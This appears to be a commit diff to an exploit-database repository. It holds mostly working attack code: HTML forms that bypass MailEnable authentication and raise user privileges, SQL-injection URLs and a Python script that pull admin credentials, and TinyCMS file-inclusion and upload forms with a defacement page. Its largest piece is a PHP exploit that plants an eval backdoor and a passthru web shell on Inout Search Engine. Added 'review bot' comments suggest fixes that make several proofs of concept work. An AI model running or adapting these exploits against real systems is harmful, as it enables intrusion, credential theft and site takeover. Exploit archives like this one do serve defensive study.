Details' Descriptions:
1)
Any user can login to web administration site with bug in "main.asp" (Enterprise)
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/meadmin/enterprise/lang/EN/main.asp" METHOD="POST">
POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="postmaster"><br>
<input type=submit>
</FORM>
-----------------------End----------------------------
2)
Authenticated normal user can gain ADMIN or SYSADMIN level, also remote user can disable him/her account!
Bug in "MailOptions.asp" file: remote authenticated user can change value of hidden field (name="LoginRights")
from "USER" to "ADMIN" or "SYSADMIN" and change it's level to up! or change value of hidden field
(name="LoginStatus") to "0" to disable him/her account!
Proof's exploit:
-----------------------Start--------------------------
<FORM METHOD="post" ACTION="http://[URL]/MEWebMail/base/default/lang/EN/MailOptions.asp?SelectedIndex=1&FormAction=Edit">
<TABLE BORDER="0">
<TR><TD>Current Password:</TD><TD><INPUT name=LoginPassword VALUE=""></TD></TR>
<TR><TD>New Password:</TD><TD><INPUT name=NewLoginPassword VALUE=""></TD></TR>
<TR><TD>Confirm New Password:</TD><TD><INPUT name=ConfirmNewLoginPassword VALUE=""></TD></TR>
</TABLE>
<INPUT NAME="LoginDescription" VALUE="Login description">
<INPUT NAME="LoginRights" VALUE="SYSADMIN">
<INPUT NAME="LoginStatus" VALUE="1">
<BR><BR>
<INPUT type=submit value="UpTime!">
</FORM>
-----------------------End----------------------------
3)
Every one (ever no authenticated user) can write a message in "Draft" folder of any users!
Bug in "Resolve.asp" file: this file don't check authenticated user!
Proof's exploit:
--------------Start---------------------
<FORM METHOD="post" ACTION="http://[url]/MEWebMail/base/default/lang/EN/Forms/MAI/Resolve.asp">
<TABLE BORDER="0">
<TR><TD>ME_MAILBOX:</TD><TD><INPUT name=ME_MAILBOX VALUE=""></TD></TR>
<TR><TD>ME_POSTOFFICE:</TD><TD><INPUT name=ME_POSTOFFICE VALUE=""></TD></TR>
<TR><TD>Folder:</TD><TD><INPUT name=Folder VALUE=""></TD></TR>
<TR><TD>ID:</TD><TD><INPUT name=ID VALUE=""></TD></TR>
<TR><TD>ComposeMode:</TD><TD><INPUT name=ComposeMode VALUE="General"></TD></TR>
<TR><TD>MsgFrom:</TD><TD><INPUT name=MsgFrom VALUE=""></TD></TR>
<TR><TD>MsgCc:</TD><TD><INPUT name=MsgCc VALUE=""></TD></TR>
<TR><TD>MsgTo:</TD><TD><INPUT name=MsgTo VALUE=""></TD></TR>
<TR><TD>MsgBCC:</TD><TD><INPUT name=MsgBCC VALUE=""></TD></TR>
<TR><TD>MsgBody:</TD><TD><INPUT name=MsgBody VALUE=""></TD></TR>
<TR><TD>MsgSubject:</TD><TD><INPUT name=MsgSubject VALUE=""></TD></TR>
</TABLE>
<BR><BR>
<INPUT type=submit value="Update" CLASS=ME_Button>
</FORM>
--------------End---------------------
4)
Make "myupload.ams" on server in "drafts" folder of every user!
Show Mail Enable folder's path if "username" or "postoffices" be incorrect!
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/MEWebMail/base/default/lang/EN/Forms/MAI/UploadAttachment.asp" ENCTYPE="multipart/form-data" METHOD="POST">
MESSAGEID<INPUT NAME=MESSAGEID TYPE="text" VALUE="test"><br>
POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="default"><br>
AUTH_PASSWORD<INPUT NAME=AUTH_PASSWORD TYPE="text" VALUE=""><br>
AUTH_USERNAME<INPUT NAME=AUTH_USERNAME TYPE="text" VALUE="testuser"><br>
Mode<INPUT NAME=Mode TYPE="text" VALUE="Compose"><br>
Folder<INPUT NAME=Folder TYPE="text" VALUE="\Drafts"><br>
ID<INPUT NAME=ID TYPE="text" VALUE="test"><br>
<TABLE>
<TR><TD>File Name</TD><TD>
<INPUT TYPE=FILE NAME="txtFile">
<INPUT TYPE=submit VALUE="Add"></TD></TR>
</TABLE>
</FORM>
-----------------------End----------------------------
5)
Make "_myupload.csv" on server in "drafts" folder of every user!
Show Mail Enable folder's path if "username" or "postoffices" be incorrect!
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/MEWebMail/base/enterprise/lang/EN/Forms/vcf/uploadcontact.asp" ENCTYPE="multipart/form-data" METHOD="POST">
MESSAGEID<INPUT NAME=MESSAGEID TYPE="text" VALUE="test123"><br>
POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="default"><br>
AUTH_PASSWORD<INPUT NAME=AUTH_PASSWORD TYPE="text" VALUE=""><br>
AUTH_USERNAME<INPUT NAME=AUTH_USERNAME TYPE="text" VALUE="testuser"><br>
Mode<INPUT NAME=Mode TYPE="text" VALUE="Compose"><br>
Folder<INPUT NAME=Folder TYPE="text" VALUE="\Drafts"><br>
ID<INPUT NAME=ID TYPE="text" VALUE="test123"><br>
<TABLE>
<TR><TD>File Name</TD><TD>
<INPUT TYPE=FILE NAME="txtFile">
<INPUT TYPE=submit VALUE="Add"></TD></TR>
</TABLE>
</FORM>
-----------------------End----------------------------
6)
Have password in source.
Proof:
-----------------------Start--------------------------
http://[URL]/MEWebmail/base/enterprise/lang/EN/Forms/MAI/ListAttachments.asp?Mode=Compose&ID=test.MAI&MsgFormat=HTML&FormAction=Send&ComposeMode=General&Folder=%5CDrafts
-----------------------End----------------------------
Product name: MailEnable Enterprise Edition
Version: All ASP version <= 2.0
URL: www.mailenable.com
Finder: Soroush Dalili
Team: GSG [Grayhatz.net]
Country: Iran
Site: Grayhatz.net
Email: IRSDL[a.t]Yahoo[d0t]Com
<< I hope secure world for all >>
# milw0rm.com [2006-06-09]


@ -1,24 +1,24 @@
# CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version) SQL Injection Vulnerability
# Risk : High
# Credit : ASIANEAGLE
# Contact: admin@asianeagle.org
# Web : www.asianeagle.org
# Download Link : http://www.aspindir.com/Kategoriler/asp/portal-&-hazir-site/?P=7&K=&T=
#Exploit:
Note : User Logins Must Be Enabled By Admin To Exploit This Vulnerability
#Admin Nick: http://[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_ADI,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201
#Admin Password :http::[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_SIFRE,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201
after login as user;
#Admin Nick : http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_ADI,3,4,5%20from%20UYELER%20where%20U_ID%20like%201
#Admin Password: http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_SIFRE,3,4,5%20from%20UYELER%20where%20U_ID%20like%201
#Forever milw0rm ;)
# milw0rm.com [2006-08-08]
# CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version) SQL Injection Vulnerability
# Risk : High
# Credit : ASIANEAGLE
# Contact: admin@asianeagle.org
# Web : www.asianeagle.org
# Download Link : http://www.aspindir.com/Kategoriler/asp/portal-&-hazir-site/?P=7&K=&T=
#Exploit:
Note : User Logins Must Be Enabled By Admin To Exploit This Vulnerability
#Admin Nick: http://[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_ADI,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201
#Admin Password :http::[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_SIFRE,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201
after login as user;
#Admin Nick : http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_ADI,3,4,5%20from%20UYELER%20where%20U_ID%20like%201
#Admin Password: http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_SIFRE,3,4,5%20from%20UYELER%20where%20U_ID%20like%201
#Forever milw0rm ;)
# milw0rm.com [2006-08-08]


@ -1,54 +1,54 @@
#!/usr/bin/python
#oneSCHOOL admin/login.asp SQL Injection explot (for all versions)
#by Guga360.
import urllib
from sys import argv
query = {'txtOperation':'Login','txtLoginID':"""
' union select min(LoginName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName>'a'--""",'txtPassword':'x','btnSubmit':'L+O+G+I+N+%3E%3E'}
queryx = urllib.urlencode(query)
if len(argv)<>2:
print """
**********
Usage:
oneSCHOOLxpl.py [host]
[+] Exploiting...
[+] User: admin
[+] Password: 123
*******************
"""
else:
try:
print '\n[+] Exploting...\n'
host = argv[1]
if host[0:7]<>'http://':
host = 'http://'+host
url = urllib.urlopen(host+'/admin/login.asp', queryx)
url = url.read()
url = url.split()
name = url.index('varchar')+2
name = url[name]
name = name.replace("'","")
print '[+] User: ' + name
query2 = query.copy()
query2['txtLoginID']="""' union select min(Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName='"""+name+"""'--"""
query2 = urllib.urlencode(query2)
url = urllib.urlopen(host+'/admin/login.asp', query2)
url = url.read()
url = url.split()
passw = url.index('varchar')+2
passw = url[passw]
passw = passw.replace("'","")
print '[+] Pass: '+passw
except:
print '[+] Not vulnerable!'
# milw0rm.com [2007-12-31]
#!/usr/bin/python
#oneSCHOOL admin/login.asp SQL Injection explot (for all versions)
#by Guga360.
import urllib
from sys import argv
query = {'txtOperation':'Login','txtLoginID':"""
' union select min(LoginName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName>'a'--""",'txtPassword':'x','btnSubmit':'L+O+G+I+N+%3E%3E'}
queryx = urllib.urlencode(query)
if len(argv)<>2:
print """
**********
Usage:
oneSCHOOLxpl.py [host]
[+] Exploiting...
[+] User: admin
[+] Password: 123
*******************
"""
else:
try:
print '\n[+] Exploting...\n'
host = argv[1]
if host[0:7]<>'http://':
host = 'http://'+host
url = urllib.urlopen(host+'/admin/login.asp', queryx)
url = url.read()
url = url.split()
name = url.index('varchar')+2
name = url[name]
name = name.replace("'","")
print '[+] User: ' + name
query2 = query.copy()
query2['txtLoginID']="""' union select min(Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName='"""+name+"""'--"""
query2 = urllib.urlencode(query2)
url = urllib.urlopen(host+'/admin/login.asp', query2)
url = url.read()
url = url.split()
passw = url.index('varchar')+2
passw = url[passw]
passw = passw.replace("'","")
print '[+] Pass: '+passw
except:
print '[+] Not vulnerable!'
# milw0rm.com [2007-12-31]


@ -68,6 +68,6 @@ write(x,buf,strlen(buf));
printf("done!\n");
close(x);
}
// milw0rm.com [2004-08-02]
}
// milw0rm.com [2004-08-02]


@ -132,6 +132,6 @@ while(1)
exit(1);
}
return 0;
}
// milw0rm.com [2005-02-25]
}
// milw0rm.com [2005-02-25]


@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4
*/
http://www.grsecurity.net/~spender/wunderbar_emporium.tgz
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
# milw0rm.com [2009-08-14]


@ -4,6 +4,6 @@
Quick and dirty exploit for this one:
http://www.frasunek.com/proto_ops.tgz
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
# milw0rm.com [2009-08-14]


@ -679,6 +679,6 @@ void banrl()
fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}
/* eoc */
// milw0rm.com [2003-08-03]
/* eoc */
// milw0rm.com [2003-08-03]


@ -923,6 +923,6 @@ int check_exp(int sock)
else return(FAD);
}
/* eoc */
// milw0rm.com [2003-08-11]
/* eoc */
// milw0rm.com [2003-08-11]


@ -213,6 +213,6 @@ void flood(void *id) {
Sleep(delay);
}
}
// milw0rm.com [2005-06-27]
}
// milw0rm.com [2005-06-27]


@ -1,10 +1,10 @@
# Particle wiki <= 1.0.2 Remote SQL_Injection - Username/Password(hash) Extractor
# Thanks to UNSECURED SYSTEMS : http://pridels.blogspot.com/2006/06/particle-wiki-sql-inj.html
# Exploited by FarhadKey from http://www.kapda.ir
Username :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select%201,1,1,1,1,username%20from%20pwiki_users%20/*
Password :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select%201,1,1,1,1,password%20from%20pwiki_users%20/*
# milw0rm.com [2006-06-05]
# Particle wiki <= 1.0.2 Remote SQL_Injection - Username/Password(hash) Extractor
# Thanks to UNSECURED SYSTEMS : http://pridels.blogspot.com/2006/06/particle-wiki-sql-inj.html
# Exploited by FarhadKey from http://www.kapda.ir
Username :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select%201,1,1,1,1,username%20from%20pwiki_users%20/*
Password :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select%201,1,1,1,1,password%20from%20pwiki_users%20/*
# milw0rm.com [2006-06-05]

13
platforms/php/webapps/37337.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/53740/info
WHMCS is prone to a cross-site scripting vulnerability and multiple HTML-parameter-pollution vulnerabilities because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the page is rendered to the user, and override existing hard-coded HTTP parameters which compromises the application.
WHMCS 5.0 is vulnerable; other versions may also be affected.
http://www.example.com/cart.php?a=add&domain=transfer&n913620=v992636
http://www.example.com/domainchecker.php?search=bulkregister&n946774=v992350
http://www.example.com/cart.php?currency=2&gid=1&n972751=v976696
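Review bot: The three probe URLs carry arbitrary `n…=v…` pairs but the file never says what a vulnerable response looks like, so a tester has nothing to check against; presumably the injected name/value is reflected into generated links or form actions on the returned page (that is what the "override existing hard-coded HTTP parameters" sentence describes), but that is not stated. A one-line note such as `# vulnerable if the injected n…=v… pair is reflected into links/form actions of the response` would make the PoC self-contained. The cross-site scripting mentioned in the description is not demonstrated in this file; the vector lives in the companion WHMCS file of this commit.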


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53740/info
WHMCS is prone to a cross-site scripting vulnerability and multiple HTML-parameter-pollution vulnerabilities because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the page is rendered to the user, and override existing hard-coded HTTP parameters which compromises the application.
WHMCS 5.0 is vulnerable; other versions may also be affected.
http://www.example.com/knowledgebase.php?action = [XSS]
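Review bot: The XSS vector on the last line has spaces around the `=` (`action = [XSS]`), so used as written the query string no longer carries a parameter named `action` (the browser percent-encodes the spaces and the name becomes `action%20`), and the injection point is never reached. The line should read `http://www.example.com/knowledgebase.php?action=[XSS]`. The `[XSS]` placeholder is presumably meant to be replaced by a URL-encoded script payload; saying so in the file would avoid the same spacing mistake being repeated by the reader.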


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53759/info
VoipNow Professional is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
VoipNow Professional 2.5.3 is vulnerable; other versions may also be vulnerable.
http://www.example.com/index.php?nsextt=[xss]


@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/53761/info
TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
TinyCMS 1.3 is vulnerable; other versions may also be affected.
<form action='http://www.example.com/inc/functions.php?view=admin&do=pages&create=new&save=1' method='post'>
<strong>Page Title :</strong>
<input type="text" name="title" size="50" value='Happy Milw0rm 1337day !'>
<textarea id="elm1" name="page">
<center>
<h1> HaCked By KedAns-Dz </h1>
<h2> Happy Milw0rm 1337-Day All Hax0rS ^.^ </h2>
<h3> Greetings t0 KeyStr0ke + JF and All 0ld School ( The Milw0rm ) </h3>
</center>
&lt;/textarea&gt;
<input type='submit' value='Upload Page'>
</form>
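Review bot: The closing tag on the line before the submit button is HTML-entity-encoded (`&lt;/textarea&gt;`), so a browser never closes the textarea: the `<input type='submit'>` and `</form>` become literal text inside it and the form cannot be submitted. The line should read `</textarea>`. The advisory also says nothing about whether `inc/functions.php?view=admin&do=pages&create=new&save=1` is reachable without an admin session; presumably the point of the PoC is that it is, but that should be stated, and where the created page is written (the `title` value looks like it becomes the file name, which I cannot confirm from this file) would tell the tester what to request afterwards.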

12
platforms/php/webapps/37341.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/53761/info
TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
TinyCMS 1.3 is vulnerable; other versions may also be affected.
<form action='http://www.example.com/index.php?page=../../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Get/Include Local File'>
</form>
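Review bot: The traversal in the form action relies on the `%00` terminator after `[ LFI ]` to cut off whatever suffix (if any) the application appends to `page`; PHP 5.3.4 and later reject paths containing a null byte in include/fopen, so on a current interpreter this PoC (and the same terminator in the `admin/admin.php` vector of this commit) will fail even if the traversal itself is still present. A one-line note in the file, e.g. `# %00 truncation needs PHP < 5.3.4; on newer PHP drop the terminator if no suffix is appended`, would save a tester a false negative. The `[ LFI ]` placeholder should be replaced with a path relative to the traversed root, e.g. `etc/passwd`.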

11
platforms/php/webapps/37342.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/53761/info
TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
TinyCMS 1.3 is vulnerable; other versions may also be affected.
<form action='http://www.example.com/admin/admin.php?view=admin&do=../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Get/Include Local File'>
</form>


@ -1,194 +1,194 @@
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
Inout Search Engine (all version) Remote Code Execution Exploit
by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>
Thanks to rgod for the php code and Marty for the Love
";
if ($argc<3) {
echo "Usage: php ".$argv[0]." Host Path cmd
Host: target server (ip/hostname)
Path: path of inoutsearchengine
cmd: a Shell command
Example:
php ".$argv[0]." localhost /inoutsearchengine/ dir";
die;
}
/*
Vuln Explanation:
Take a look on one of the admin files, the begin should be something like this:
<?php
include("config.inc.php");
if(!isset($_COOKIE['admin']))
{
header("Location:index.php");
}
?>
this is not a protection for two reasons:
i) everyone can make a cookie with false credentials
ii) there isn't any exit or die function after header('Location: index.php')
Now look at create engine.php, and you find that there isn't any parse of the
text you send as the engine name..
Besides that the names of the tabs are written into a PHP files to make faster
the loading process.. the only limit we have while we inject the code is taht we
can't put spaces in the code, otherwise php will end with an error..
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$cmd.=" ".$argv[$i];
}
$cmd=urlencode($cmd);
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "- Injecting Shell Creator..\r\n";
/*
It was too simple to inject directly the shell into the file..
Let's make the process longer :P
*/
$data="term=<?eval(base64_decode(\$_POST[shell]));?>&Submit=Create+New+Engine+%21+&spl=term";
$packet="POST ".$p."admin/create_engine.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."admin/create_engine.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "- refreshing data file..\r\n";
$packet="GET ".$p."admin/generate_tabs.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
echo "- Creating the real Shell..\r\n";
/*
Costumize it as you want..
*/
$my_shell = base64_encode('$fp=fopen(\'piggy_marty.php\',\'w\');
fputs($fp,\'<?php error_reporting(0);
set_time_limit(0);
if (get_magic_quotes_gpc()) {
$_GET[cmd]=stripslashes($_GET[cmd]);
}
echo 666999;
passthru($_GET[cmd]);
echo 666999;
?>\');
fclose($fp);
chmod(\'piggy_marty.php\',777);');
$data="shell=$my_shell";
$packet="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "StepX - Executing Shell..\r\n";
$packet="GET ".$p."piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=$cmd\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"666999"))
{
echo "Exploit succeeded...\r\n";
$temp=explode("666999",$html);
die("\r\n".$temp[1]."\r\n");
}
# Coded With BH Fast Generator v0.1
?>
# milw0rm.com [2007-05-29]
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
Inout Search Engine (all version) Remote Code Execution Exploit
by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>
Thanks to rgod for the php code and Marty for the Love
";
if ($argc<3) {
echo "Usage: php ".$argv[0]." Host Path cmd
Host: target server (ip/hostname)
Path: path of inoutsearchengine
cmd: a Shell command
Example:
php ".$argv[0]." localhost /inoutsearchengine/ dir";
die;
}
/*
Vuln Explanation:
Take a look on one of the admin files, the begin should be something like this:
<?php
include("config.inc.php");
if(!isset($_COOKIE['admin']))
{
header("Location:index.php");
}
?>
this is not a protection for two reasons:
i) everyone can make a cookie with false credentials
ii) there isn't any exit or die function after header('Location: index.php')
Now look at create engine.php, and you find that there isn't any parse of the
text you send as the engine name..
Besides that the names of the tabs are written into a PHP files to make faster
the loading process.. the only limit we have while we inject the code is taht we
can't put spaces in the code, otherwise php will end with an error..
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$cmd.=" ".$argv[$i];
}
$cmd=urlencode($cmd);
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "- Injecting Shell Creator..\r\n";
/*
It was too simple to inject directly the shell into the file..
Let's make the process longer :P
*/
$data="term=<?eval(base64_decode(\$_POST[shell]));?>&Submit=Create+New+Engine+%21+&spl=term";
$packet="POST ".$p."admin/create_engine.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."admin/create_engine.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "- refreshing data file..\r\n";
$packet="GET ".$p."admin/generate_tabs.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
echo "- Creating the real Shell..\r\n";
/*
Costumize it as you want..
*/
$my_shell = base64_encode('$fp=fopen(\'piggy_marty.php\',\'w\');
fputs($fp,\'<?php error_reporting(0);
set_time_limit(0);
if (get_magic_quotes_gpc()) {
$_GET[cmd]=stripslashes($_GET[cmd]);
}
echo 666999;
passthru($_GET[cmd]);
echo 666999;
?>\');
fclose($fp);
chmod(\'piggy_marty.php\',777);');
$data="shell=$my_shell";
$packet="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "StepX - Executing Shell..\r\n";
$packet="GET ".$p."piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=$cmd\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"666999"))
{
echo "Exploit succeeded...\r\n";
$temp=explode("666999",$html);
die("\r\n".$temp[1]."\r\n");
}
# Coded With BH Fast Generator v0.1
?>
# milw0rm.com [2007-05-29]


